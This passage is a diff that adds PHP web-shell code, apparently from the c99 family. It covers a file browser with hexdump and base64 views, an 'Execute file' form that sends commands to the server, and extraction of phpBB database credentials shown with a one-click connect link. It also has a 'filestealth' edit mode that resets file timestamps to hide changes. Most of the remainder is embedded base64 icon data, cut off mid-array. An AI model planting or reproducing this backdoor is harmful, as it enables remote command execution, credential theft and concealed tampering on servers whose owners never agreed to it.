+      echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+      if (!$win) {
+        echo "<tr><td><b>Owner/Group</b></td><td> ";
+        $ow = posix_getpwuid(fileowner($d.$f));
+        $gr = posix_getgrgid(filegroup($d.$f));
+        echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+      }
+      echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
+      $fi = fopen($d.$f,"rb");
+      if ($fi) {
+        if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+        else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+        $n = 0;
+        $a0 = "00000000<br>";
+        $a1 = "";
+        $a2 = "";
+        for ($i=0; $i<strlen($str); $i++) {
+          $a1 .= sprintf("%02X",ord($str[$i]))." ";
+          switch (ord($str[$i])) {
+            case 0:  $a2 .= "<font>0</font>"; break;
+            case 32:
+            case 10:
+            case 13: $a2 .= "&nbsp;"; break;
+            default: $a2 .= htmlspecialchars($str[$i]);
+          }
+          $n++;
+          if ($n == $hexdump_rows) {
+            $n = 0;
+            if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+            $a1 .= "<br>";
+            $a2 .= "<br>";
+          }
+        }
+        echo "<table border=1 bgcolor=#666666>".
+             "<tr><td bgcolor=#666666>".$a0."</td>".
+             "<td bgcolor=#000000>".$a1."</td>".
+             "<td bgcolor=#000000>".$a2."</td>".
+             "</tr></table><br>";
+      }
+      $encoded = "";
+      if ($base64 == 1) {
+        echo "<b>Base64 Encode</b><br>";
+        $encoded = base64_encode(file_get_contents($d.$f));
+      }
+      elseif($base64 == 2) {
+        echo "<b>Base64 Encode + Chunk</b><br>";
+        $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+      }
+      elseif($base64 == 3) {
+        echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+        $encoded = base64_encode(file_get_contents($d.$f));
+        $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+      }
+      elseif($base64 == 4) {
+        $text = file_get_contents($d.$f);
+        $encoded = base64_decode($text);
+        echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+        <P>";
+  }
+  elseif ($ft == "html") {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {dQ99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess") {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe") {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code") {
+    if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) {
+      $arr = explode("\n",$r);
+      if (count($arr == 18)) {
+        include($d.$f);
+        echo "<b>phpBB configuration is detected in this file!<br>";
+        if ($dbms == "mysql4") {$dbms = "mysql";}
+        if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+        else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ".$sh_name.". Please, report us for fix.";}
+        echo "Parameters for manual connect:<br>";
+        $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+        foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+        echo "</b><hr size=\"1\" noshade>";
+      }
+    }
+    echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+    if (!empty($white)) {@ob_clean();}
+    highlight_file($d.$f);
+    if (!empty($white)) {dQ99shexit();}
+    echo "</div>";
+  }
+  elseif ($ft == "download") {
+    @ob_clean();
+    header("Content-type: application/octet-stream");
+    header("Content-length: ".filesize($d.$f));
+    header("Content-disposition: attachment; filename=\"".$f."\";");
+    echo $r;
+    exit;
+  }
+  elseif ($ft == "notepad") {
+    @ob_clean();
+    header("Content-type: text/plain");
+    header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+    echo($r);
+    exit;
+  }
+  elseif ($ft == "img") {
+    $inf = getimagesize($d.$f);
+    if (!$white) {
+      if (empty($imgsize)) {$imgsize = 20;}
+      $width = $inf[0]/100*$imgsize;
+      $height = $inf[1]/100*$imgsize;
+      echo "<center><b>Size:</b>&nbsp;";
+      $sizes = array("100","50","20");
+      foreach ($sizes as $v) {
+        echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+        if ($imgsize != $v ) {echo $v;}
+        else {echo "<u>".$v."</u>";}
+        echo "</a>&nbsp;&nbsp;&nbsp;";
+      }
+      echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+    }
+    else {
+      @ob_clean();
+      $ext = explode($f,".");
+      $ext = $ext[count($ext)-1];
+      header("Content-type: ".$inf["mime"]);
+      readfile($d.$f);
+      exit;
+    }
+  }
+  elseif ($ft == "edit") {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown file type (".$ext."), please select type manually.</b></center>";}
+}
+echo "</div>\n";
+}
+}
+else {
+@ob_clean();
+$images = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIABAP///wAAACH5BAHoAwEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGdQChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1dQ19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9dQ7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9dQ////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9dQ01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9dQ01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++dQ/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/dQ6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
+"yAsokBkQADs=",
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5dQ4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwdQtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9dQwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSdQ10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_asp"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_mp3"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
